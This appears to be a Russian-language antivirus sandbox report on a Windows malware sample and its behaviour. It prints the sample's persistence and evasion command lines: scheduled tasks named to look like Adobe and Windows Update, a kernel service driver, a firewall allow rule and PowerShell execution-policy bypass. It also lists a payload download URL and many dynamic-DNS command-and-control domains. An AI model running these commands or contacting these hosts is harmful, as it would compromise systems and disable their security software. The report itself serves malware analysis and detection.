Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,%WINDIR%\INF\.NETFramework\CORPerfMonSymbols.exe'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\launch adobe ccxprocess
- <SYSTEM32>\tasks\xccprocess
- <SYSTEM32>\tasks\microsoft\windows\windows update listner
- <SYSTEM32>\tasks\microsoft\microsoft launcher
Устанавливает следующие настройки сервисов
- [HKLM\SYSTEM\CurrentControlSet\Services\aswArPot.sys] 'ImagePath' = '%WINDIR%\temp\aswArPot.bin'
- [HKLM\SYSTEM\CurrentControlSet\Services\System Diagnostics Host] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\System Diagnostics Host] 'ImagePath' = '%WINDIR%\SysWOW64\SystemDiagnosticsHost.exe'
Создает следующие сервисы
- 'aswArPot.sys' %WINDIR%\temp\aswArPot.bin
- 'System Diagnostics Host' %WINDIR%\SysWOW64\SystemDiagnosticsHost.exe
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="XCCProcess" dir=in action=allow program="%WINDIR%\Media\mppr.exe" enable=yes
Запускает большое число процессов
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\securityhealthsystray.exe
- <SYSTEM32>\securityhealthservice.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tmpc995.tmp.exe
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\<Имя файла>.exe.log
- %WINDIR%\media\mppr.exe
- %WINDIR%\inputmethod\shared\rc_connectedaccount.exe
- %TEMP%\vue1qiy4\vue1qiy4.0.cs
- %TEMP%\vue1qiy4\vue1qiy4.cmdline
- %TEMP%\vue1qiy4\vue1qiy4.out
- %TEMP%\csc88fbb0154ab44524adb7fa2ad6a0fa5.tmp
- %TEMP%\resf8a4.tmp
- %TEMP%\tmpf1be.tmp
- %WINDIR%\inf\.netframework\corperfmonsymbols.exe
- %TEMP%\0hqqr1fq\0hqqr1fq.0.cs
- %TEMP%\0hqqr1fq\0hqqr1fq.cmdline
- %TEMP%\0hqqr1fq\0hqqr1fq.out
- %TEMP%\csc2b79d265e094767af908195d5c188f2.tmp
- %TEMP%\resfefd.tmp
- %TEMP%\tmpfb25.tmp
- %WINDIR%\inf\usbhub\usbperfsym.exe
- %WINDIR%\syswow64\systemdiagnosticshost.exe
- %WINDIR%\media\msldriver.dll
- %WINDIR%\temp\aswarpot.bin
- C:\recovery\oem\resetconfig.xml
- C:\recovery\oem\2a101692-0db7-4fac-8c0d-d1d65deb912b.bat
- C:\recovery\oem\d329f36f-35e7-4b32-911a-91466ad8cc07.exe
- %TEMP%\2tbeirai.rl0.bat
- nul
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\tmpc995.tmp.exe.log
- %TEMP%\tmp9d50.tmp
- %TEMP%\tmp9e7a.tmp
- %WINDIR%\temp\tmpa1f4.tmp
- %WINDIR%\temp\tmpa252.tmp
- %WINDIR%\temp\tmp15dd.tmp.exe
- %TEMP%\tmp167a.tmp.exe
- %WINDIR%\temp\__psscriptpolicytest_0ixckwzj.hxl.ps1
- %WINDIR%\temp\__psscriptpolicytest_xg05j1ub.xjb.psm1
- %WINDIR%\temp\content\4892-472-powershell.exe-08-57-21-748.dump
- %WINDIR%\temp\content\4892-472-powershell.exe-08-57-22-509.dump
- %WINDIR%\temp\content\4892-472-powershell.exe-08-57-22-842.dump
- %WINDIR%\temp\content\4892-472-powershell.exe-08-57-23-474.dump
- %WINDIR%\temp\content\4892-472-powershell.exe-08-57-24-767.dump
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\tmp167a.tmp.exe.log
- %WINDIR%\syswow64\config\systemprofile\appdata\local\microsoft\clr_v4.0_32\usagelogs\tmp15dd.tmp.exe.log
Присваивает атрибут 'скрытый' для следующих файлов
- %WINDIR%\media\mppr.exe
- %WINDIR%\inputmethod\shared\rc_connectedaccount.exe
- %WINDIR%\inf\.netframework\corperfmonsymbols.exe
- %WINDIR%\inf\usbhub\usbperfsym.exe
- %WINDIR%\syswow64\systemdiagnosticshost.exe
- %WINDIR%\media\msldriver.dll
Удаляет файлы, которые сам же создал
- %TEMP%\resf8a4.tmp
- %TEMP%\csc88fbb0154ab44524adb7fa2ad6a0fa5.tmp
- %TEMP%\vue1qiy4\vue1qiy4.0.cs
- %TEMP%\vue1qiy4\vue1qiy4.cmdline
- %TEMP%\vue1qiy4\vue1qiy4.out
- %TEMP%\tmpf1be.tmp
- %TEMP%\resfefd.tmp
- %TEMP%\csc2b79d265e094767af908195d5c188f2.tmp
- %TEMP%\0hqqr1fq\0hqqr1fq.cmdline
- %TEMP%\0hqqr1fq\0hqqr1fq.0.cs
- %TEMP%\0hqqr1fq\0hqqr1fq.out
- %TEMP%\tmpfb25.tmp
- %TEMP%\tmp9d50.tmp
- %TEMP%\tmp9e7a.tmp
- %WINDIR%\temp\tmpa1f4.tmp
- %WINDIR%\temp\tmpa252.tmp
- %WINDIR%\temp\__psscriptpolicytest_0ixckwzj.hxl.ps1
- %WINDIR%\temp\__psscriptpolicytest_xg05j1ub.xjb.psm1
Сетевая активность
Подключается к
- 'vv######jnj25i5.hopto.org':443
- 'vv######jnj25i5.hopto.org':80
TCP
Запросы HTTP GET
- http://87.##0.186.104/files/loader/SteamSetup.exe
Другие
- 'vv######jnj25i5.hopto.org':443
UDP
- DNS ASK 7n########weo91.freedynamicdns.org
- DNS ASK 91####fjnqtphj2.cc
- DNS ASK q9########9qh4v.freedynamicdns.org
- DNS ASK vq#######zqtqe1.bounceme.net
- DNS ASK 2n#######ywio91.ddnsking.com
- DNS ASK 2n######k4l2o91.webhop.me
- DNS ASK 2q######kwl4qe1.webhop.me
- DNS ASK ty#######t82qlo.bounceme.net
- DNS ASK 29#######t9ih4v.ddnsking.com
- DNS ASK 91########tphj2.freedynamicdns.org
- DNS ASK ww#######yui3s1.ddnsking.com
- DNS ASK 2n######k4l2o91.myftp.org
- DNS ASK 29######el2h4tv.webhop.me
- DNS ASK 2n######qywio91.myftp.org
- DNS ASK 7n####9tqyweo91.top
- DNS ASK 2y######ht8iqlo.myftp.org
- DNS ASK mq#######dlqt91.3utilities.com
- DNS ASK vv####dsjnj25i5.cc
- DNS ASK q9######qt9qh4v.webhop.me
- DNS ASK 91######nqtphj2.myftp.org
- DNS ASK 2y######ht8iqlo.hopto.org
- DNS ASK xq#######twe81v.3utilities.com
- DNS ASK 2y######ht8iqlo.gotdns.ch
- DNS ASK 7n######qyweo91.webhop.me
- DNS ASK ww######gyui3s1.hopto.org
- DNS ASK ww####nwgyui3s1.top
- DNS ASK vv#######ij25i4.3utilities.com
- DNS ASK 29######el2h4tv.myftp.org
- DNS ASK vq#######zqtqe1.3utilities.com
- DNS ASK kq#######tph2l9.3utilities.com
- DNS ASK vv####wwgyuigi2.cc
- DNS ASK vv######jnj25i5.myftp.org
- DNS ASK 7x######tn5sjr3.myftp.org
- DNS ASK 7x######tn5sjr3.webhop.me
- DNS ASK ty########82qlo.freedynamicdns.org
- DNS ASK 2q######kwl4qe1.hopto.org
- DNS ASK 7x########5sjr3.freedynamicdns.org
- DNS ASK ty####fqht82qlo.cc
- DNS ASK 3w########yeqow.freedynamicdns.org
- DNS ASK xq######qtwe81v.webhop.me
- DNS ASK 7n######qyweo91.myftp.org
- DNS ASK 8j######wi6ns92.hopto.org
- DNS ASK vq#######zqtqe1.ddnsking.com
- DNS ASK 3w######htyeqow.hopto.org
- DNS ASK 29#######l2h4tv.ddnsking.com
- DNS ASK kq######qtph2l9.webhop.me
- DNS ASK 2y######kfl2qlo.webhop.me
- DNS ASK 7n#######yweo91.3utilities.com
- DNS ASK 7x######tn5sjr3.hopto.org
- DNS ASK q9######qt9qh4v.myftp.org
- DNS ASK 29########2h4tv.freedynamicdns.org
- DNS ASK vv#######nj25i5.bounceme.net
- DNS ASK vq######nzqtqe1.webhop.me
- DNS ASK xq######qtwe81v.gotdns.ch
- DNS ASK 0a####pqjtwkq21.cc
- DNS ASK xq#######twe81v.bounceme.net
- DNS ASK vv######gyuigi2.webhop.me
- DNS ASK q9####jfqt9qh4v.cc
- DNS ASK 7n#######yweo91.ddnsking.com
- DNS ASK 2n######k4l2o91.hopto.org
- DNS ASK 2y########8iqlo.freedynamicdns.org
- DNS ASK xq####fnqtwe81v.cc
- DNS ASK vv#######yuigi2.3utilities.com
- DNS ASK z8#######xt19zq.ddnsking.com
- DNS ASK 29####juqt9ih4v.cc
- DNS ASK 2y#######fl2qlo.ddnsking.com
- DNS ASK vq####fqnzqtqe1.cc
- DNS ASK 2q#######f22qe1.bounceme.net
- DNS ASK 8j#######i6ns92.3utilities.com
- DNS ASK ty######ht82qlo.webhop.me
- DNS ASK 2q########l4qe1.freedynamicdns.org
- DNS ASK 7x######tn5sjr3.gotdns.ch
- DNS ASK z8#######xt19zq.bounceme.net
- DNS ASK 91#######qtphj2.ddnsking.com
- DNS ASK q9######qt9qh4v.hopto.org
- DNS ASK 8j######wi6ns92.myftp.org
- DNS ASK mq#######dlqt91.ddnsking.com
- DNS ASK 2n########l2o91.freedynamicdns.org
- DNS ASK kq######qtph2l9.hopto.org
- DNS ASK 2n#######4l2o91.3utilities.com
- DNS ASK 2q######kf22qe1.gotdns.ch
- DNS ASK 2y#######t8iqlo.3utilities.com
- DNS ASK 7n####9tqyweo91.cc
- DNS ASK vv#######ij25i4.ddnsking.com
- DNS ASK 7n######qyweo91.hopto.org
- DNS ASK kq####j2qtph2l9.top
- DNS ASK mq######9dlqt91.myftp.org
- DNS ASK 29####jsel2h4tv.cc
- DNS ASK vv#######ij25i4.bounceme.net
- DNS ASK vv########j25i5.freedynamicdns.org
- DNS ASK vv#######yuigi2.bounceme.net
- DNS ASK 91#######qtphj2.3utilities.com
- DNS ASK 29######qt9ih4v.webhop.me
- DNS ASK vv######oij25i4.webhop.me
- DNS ASK vq########qtqe1.freedynamicdns.org
- DNS ASK 0a######jtwkq21.webhop.me
- DNS ASK 2y####fuht8iqlo.cc
- DNS ASK 91######nqtphj2.hopto.org
- DNS ASK kq#######tph2l9.ddnsking.com
- DNS ASK 2q#######wl4qe1.ddnsking.com
- DNS ASK 2n#######4l2o91.ddnsking.com
- DNS ASK vv######jnj25i5.gotdns.ch
- DNS ASK 91####fjnqtphj2.top
- DNS ASK 29#######l2h4tv.bounceme.net
- DNS ASK 8j########6ns92.freedynamicdns.org
- DNS ASK ww####nwgyui3s1.cc
- DNS ASK vv####dsjnj25i5.top
- DNS ASK ww######gyui3s1.webhop.me
- DNS ASK 3w#######tyeqow.bounceme.net
- DNS ASK 2y######kfl2qlo.myftp.org
- DNS ASK 29######el2h4tv.gotdns.ch
- DNS ASK ty#######t82qlo.3utilities.com
- DNS ASK 0a#######twkq21.bounceme.net
- DNS ASK 2q####fskf22qe1.cc
- DNS ASK 2q######kf22qe1.myftp.org
- DNS ASK 2q######kf22qe1.hopto.org
- DNS ASK 2n####9sk4l2o91.top
- DNS ASK 2n#######4l2o91.bounceme.net
- DNS ASK z8########t19zq.freedynamicdns.org
- DNS ASK 3w####2qhtyeqow.top
- DNS ASK vq######nzqtqe1.gotdns.ch
- DNS ASK 0a########wkq21.freedynamicdns.org
- DNS ASK q9#######t9qh4v.bounceme.net
- DNS ASK vv#######nj25i5.3utilities.com
- DNS ASK 0a######jtwkq21.gotdns.ch
- DNS ASK vv####u9oij25i4.top
- DNS ASK ty######ht82qlo.myftp.org
- DNS ASK 2n####9uqywio91.top
- DNS ASK 7x#######n5sjr3.3utilities.com
- DNS ASK 7x#######n5sjr3.ddnsking.com
- DNS ASK 7x####lqtn5sjr3.top
- DNS ASK 29######el2h4tv.hopto.org
- DNS ASK kq########ph2l9.freedynamicdns.org
- DNS ASK ww#######yui3s1.bounceme.net
- DNS ASK 2n####9sk4l2o91.cc
- DNS ASK xq####fnqtwe81v.top
- DNS ASK 29####juqt9ih4v.top
- DNS ASK 2y######kfl2qlo.hopto.org
- DNS ASK 29####jsel2h4tv.top
- DNS ASK 2y########l2qlo.freedynamicdns.org
- DNS ASK 2n######qywio91.gotdns.ch
- DNS ASK q9######qt9qh4v.gotdns.ch
- DNS ASK 2q#######wl4qe1.3utilities.com
- DNS ASK 2q######kf22qe1.webhop.me
- DNS ASK 2q######kwl4qe1.myftp.org
- DNS ASK kq######qtph2l9.myftp.org
- DNS ASK vq####fqnzqtqe1.top
- DNS ASK 0a######jtwkq21.myftp.org
- DNS ASK 29#######t9ih4v.bounceme.net
- DNS ASK 2y######kfl2qlo.gotdns.ch
- DNS ASK z8####jqpxt19zq.cc
- DNS ASK 8j####glwi6ns92.top
- DNS ASK 29######qt9ih4v.gotdns.ch
- DNS ASK 7n######qyweo91.gotdns.ch
- DNS ASK vv######oij25i4.hopto.org
- DNS ASK 29######qt9ih4v.myftp.org
- DNS ASK 3w#######tyeqow.ddnsking.com
- DNS ASK mq######9dlqt91.webhop.me
- DNS ASK 2y######ht8iqlo.webhop.me
- DNS ASK 7x####lqtn5sjr3.cc
- DNS ASK mq######9dlqt91.hopto.org
- DNS ASK kq#######tph2l9.bounceme.net
- DNS ASK vv#######nj25i5.ddnsking.com
- DNS ASK z8######pxt19zq.myftp.org
- DNS ASK xq######qtwe81v.hopto.org
- DNS ASK ty######ht82qlo.hopto.org
- DNS ASK 91#######qtphj2.bounceme.net
- DNS ASK 2q#######f22qe1.ddnsking.com
- DNS ASK xq########we81v.freedynamicdns.org
- DNS ASK 2y####fskfl2qlo.cc
- DNS ASK 2y#######fl2qlo.bounceme.net
- DNS ASK ww#######yui3s1.3utilities.com
- DNS ASK 2n#######ywio91.3utilities.com
- DNS ASK 3w######htyeqow.webhop.me
- DNS ASK mq######9dlqt91.gotdns.ch
- DNS ASK 0a######jtwkq21.hopto.org
- DNS ASK 91######nqtphj2.webhop.me
- DNS ASK 91######nqtphj2.gotdns.ch
- DNS ASK vv######jnj25i5.webhop.me
- DNS ASK 0a#######twkq21.3utilities.com
- DNS ASK 29######qt9ih4v.hopto.org
- DNS ASK 29########9ih4v.freedynamicdns.org
- DNS ASK 8j######wi6ns92.webhop.me
- DNS ASK 2q#######f22qe1.3utilities.com
- DNS ASK ty####fqht82qlo.top
- DNS ASK 2q####fskf22qe1.top
- DNS ASK 2n#######ywio91.bounceme.net
- DNS ASK 2q########22qe1.freedynamicdns.org
- DNS ASK 2q#######wl4qe1.bounceme.net
- DNS ASK 8j######wi6ns92.gotdns.ch
- DNS ASK vv######oij25i4.gotdns.ch
- DNS ASK vv########uigi2.freedynamicdns.org
- DNS ASK z8######pxt19zq.hopto.org
- DNS ASK 29#######l2h4tv.3utilities.com
- DNS ASK 3w######htyeqow.gotdns.ch
- DNS ASK vv######oij25i4.myftp.org
- DNS ASK vv####u9oij25i4.cc
- DNS ASK 2q####fskwl4qe1.cc
- DNS ASK mq#######dlqt91.bounceme.net
- DNS ASK mq########lqt91.freedynamicdns.org
- DNS ASK ww######gyui3s1.myftp.org
- DNS ASK z8####jqpxt19zq.top
- DNS ASK q9#######t9qh4v.3utilities.com
- DNS ASK 2n########wio91.freedynamicdns.org
- DNS ASK vv####wwgyuigi2.top
- DNS ASK z8#######xt19zq.3utilities.com
- DNS ASK ty#######t82qlo.ddnsking.com
- DNS ASK ty######ht82qlo.gotdns.ch
- DNS ASK vq######nzqtqe1.hopto.org
- DNS ASK vv#######yuigi2.ddnsking.com
- DNS ASK z8######pxt19zq.webhop.me
- DNS ASK 7x#######n5sjr3.bounceme.net
- DNS ASK 7n#######yweo91.bounceme.net
- DNS ASK kq####j2qtph2l9.cc
- DNS ASK 2n######qywio91.hopto.org
- DNS ASK kq######qtph2l9.gotdns.ch
- DNS ASK 3w#######tyeqow.3utilities.com
- DNS ASK 2n######k4l2o91.gotdns.ch
- DNS ASK vv########j25i4.freedynamicdns.org
- DNS ASK 2y#######t8iqlo.ddnsking.com
- DNS ASK 3w####2qhtyeqow.cc
- DNS ASK 2y####fuht8iqlo.top
- DNS ASK 2q####fskwl4qe1.top
- DNS ASK ww########ui3s1.freedynamicdns.org
- DNS ASK vv######gyuigi2.hopto.org
- DNS ASK xq#######twe81v.ddnsking.com
- DNS ASK vv######gyuigi2.gotdns.ch
- DNS ASK 3w######htyeqow.myftp.org
- DNS ASK vv######jnj25i5.hopto.org
- DNS ASK 2y####fskfl2qlo.top
- DNS ASK 0a####pqjtwkq21.top
- DNS ASK 8j####glwi6ns92.cc
- DNS ASK q9####jfqt9qh4v.top
Другое
Ищет следующие окна
- ClassName: 'MouseZ' WindowName: 'Magellan MSWHEEL'
Создает и запускает на исполнение
- '%TEMP%\tmpc995.tmp.exe'
- '%WINDIR%\syswow64\systemdiagnosticshost.exe'
- '%WINDIR%\media\mppr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' –ExecutionPolicy Bypass Start-Process -FilePath '"%WINDIR%\TEMP\tmp15DD.tmp.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' –ExecutionPolicy Bypass Start-Process -FilePath '"%TEMP%\tmp167A.tmp.exe"'
- '%WINDIR%\temp\tmp15dd.tmp.exe'
- '%TEMP%\tmp167a.tmp.exe'
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\vue1qiy4\vue1qiy4.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF8A4.tmp" "%TEMP%\CSC88FBB0154AB44524ADB7FA2AD6A0FA5.TMP" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\0hqqr1fq\0hqqr1fq.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFEFD.tmp" "%TEMP%\CSC2B79D265E094767AF908195D5C188F2.TMP" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c sc.exe create aswArPot.sys binPath= %WINDIR%\temp\aswArPot.bin type= kernel & exit
- '<SYSTEM32>\sc.exe' create aswArPot.sys binPath= %WINDIR%\temp\aswArPot.bin type= kernel
- '<SYSTEM32>\cmd.exe' /c sc.exe start aswArPot.sys & exit
- '<SYSTEM32>\sc.exe' start aswArPot.sys
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /rl highest /tn "Launch Adobe CCXProcess" /tr "%WINDIR%\Media\mppr.exe" /sc onlogon & exit
- '<SYSTEM32>\schtasks.exe' /create /f /rl highest /tn "Launch Adobe CCXProcess" /tr "%WINDIR%\Media\mppr.exe" /sc onlogon
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /rl highest /tn "XCCProcess" /tr "%WINDIR%\INF\usbhub\usbperfsym.exe" /sc onlogon & exit
- '<SYSTEM32>\schtasks.exe' /create /f /rl highest /tn "XCCProcess" /tr "%WINDIR%\INF\usbhub\usbperfsym.exe" /sc onlogon
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc minute /rl highest /mo 2 /tn "Microsoft\Windows\Windows Update Listner" /tr "%WINDIR%\Media\mppr.exe" & exit
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /rl highest /mo 2 /tn "Microsoft\Windows\Windows Update Listner" /tr "%WINDIR%\Media\mppr.exe"
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc minute /rl highest /mo 5 /tn "Microsoft\Microsoft Launcher" /tr "%WINDIR%\InputMethod\SHARED\RC_ConnectedAccount.exe" & exit
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /rl highest /mo 5 /tn "Microsoft\Microsoft Launcher" /tr "%WINDIR%\InputMethod\SHARED\RC_ConnectedAccount.exe"
- '<SYSTEM32>\cmd.exe' /c sc query "System Diagnostics Host" & exit
- '<SYSTEM32>\sc.exe' query "System Diagnostics Host"
- '<SYSTEM32>\cmd.exe' /c sc create "System Diagnostics Host" binPath= "%WINDIR%\SysWOW64\SystemDiagnosticsHost.exe" obj= "LocalSystem" start= auto & exit
- '<SYSTEM32>\sc.exe' create "System Diagnostics Host" binPath= "%WINDIR%\SysWOW64\SystemDiagnosticsHost.exe" obj= "LocalSystem" start= auto
- '<SYSTEM32>\cmd.exe' /c sc description "System Diagnostics Host" "Monitors and manages system diagnostic tasks." & exit
- '<SYSTEM32>\sc.exe' description "System Diagnostics Host" "Monitors and manages system diagnostic tasks."
- '<SYSTEM32>\cmd.exe' /c sc start "System Diagnostics Host" & exit
- '<SYSTEM32>\sc.exe' start "System Diagnostics Host"
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall show rule name="XCCProcess" & exit
- '<SYSTEM32>\netsh.exe' advfirewall firewall show rule name="XCCProcess"
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall add rule name="XCCProcess" dir=in action=allow program="%WINDIR%\Media\mppr.exe" enable=yes & exit
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2tbeirai.rl0.bat""
- '<SYSTEM32>\timeout.exe' 8
- '<SYSTEM32>\cmd.exe' /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"%WINDIR%\TEMP\tmp15DD.tmp.exe"' & exit (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"%TEMP%\tmp167A.tmp.exe"' & exit (со скрытым окном)
- '%ProgramFiles(x86)%\steam\steam.exe'
- '<SYSTEM32>\securityhealthservice.exe'
